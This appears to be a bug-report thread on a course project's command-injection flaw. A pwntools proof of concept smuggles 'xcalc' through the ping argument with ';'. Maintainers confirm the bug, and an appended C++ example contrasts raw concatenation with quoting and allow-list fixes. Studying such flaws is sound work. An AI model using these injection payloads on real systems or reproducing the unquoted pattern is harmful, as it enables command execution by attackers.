They have an "escape" function they use to escape strings that represent a path, but they do not check against any ";" character that one could potentially use to terminate a command and start a new one. Thus, I exploited the ping command by appending another new command (xcalc) that will be executed right after the ping.
Here is a PoC:
#!/usr/bin/env python3
from pwn import *

# Start the client and point it at the server listening locally on port 1337.
sh = process(['./client', '127.0.0.1', '1337'])
# sendline() appends the newline itself, so no trailing "\n" is needed;
# the ';' ends the ping command and xcalc is run as a second command.
sh.sendline(b"ping google.ch;xcalc")
# interactive() hands the session to the user and returns nothing, so it is not printed.
sh.interactive()
You are correct, there is indeed a vulnerability in the ping command and we certify that your exploit works. 🥇
However, let me make some clarifications:
While we have an escape function as you noticed, one of our programmers somehow forgot to call it for the ping command.
Moreover, this escape function only escapes quotes in a given string, which is an intended behavior. The idea is to put the escaped user-supplied arguments of bash commands between quotes to prevent the execution of unintended additional commands. As an example, have a look at the cd command which does not suffer from the same vulnerability:
Where:
grass/src/commands.cpp
Line 71 in a5b8f5a
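The mitigation the maintainers describe (escape quotes, then wrap the user-supplied argument in quotes so a `;` can no longer end the command) as an added example; this is not code from the grass project, and `shellQuote`, `buildPingCommandVulnerable`, `buildPingCommandQuoted` and `isPlausibleHost` are hypothetical names. It uses single quotes with the `'\''` idiom, which is stricter than a double-quoted wrapper because bash also leaves `$`, backticks and backslashes literal inside single quotes.

```cpp
// Added example, not the grass project's own code: quote-escaping plus
// quoting of a user-supplied shell argument, beside the raw concatenation
// the issue reports for the ping command.
#include <cctype>
#include <iostream>
#include <string>

// Hypothetical escape helper: emit the argument as one single-quoted shell
// word. Inside single quotes bash treats ';', '&', '|', '$' and backticks
// literally; only an embedded single quote needs care, written as '\''.
std::string shellQuote(const std::string& arg) {
    std::string out = "'";
    for (char c : arg) {
        if (c == '\'') out += "'\\''";
        else out += c;
    }
    out += "'";
    return out;
}

// The vulnerable shape from the issue: the argument is concatenated raw,
// so "google.ch;xcalc" becomes two shell commands.
std::string buildPingCommandVulnerable(const std::string& host) {
    return "ping -c 1 " + host;
}

// Hardened shape (what the maintainers describe for cd): the whole argument
// is a single quoted word, so the ';' is passed to ping as part of the host.
std::string buildPingCommandQuoted(const std::string& host) {
    return "ping -c 1 " + shellQuote(host);
}

// Defence in depth: ping only needs a hostname or IP literal, so an allow-list
// check rejects shell metacharacters before any command line is built.
bool isPlausibleHost(const std::string& host) {
    if (host.empty() || host.size() > 253) return false;
    for (char c : host) {
        unsigned char uc = static_cast<unsigned char>(c);
        if (!(std::isalnum(uc) || c == '.' || c == '-' || c == ':')) return false;
    }
    return true;
}

int main() {
    const std::string input = "google.ch;xcalc";  // constructed sample input
    std::cout << "raw:      " << buildPingCommandVulnerable(input) << "\n";
    std::cout << "quoted:   " << buildPingCommandQuoted(input) << "\n";
    std::cout << "accepted: " << (isPlausibleHost(input) ? "yes" : "no") << "\n";
    return 0;
}
```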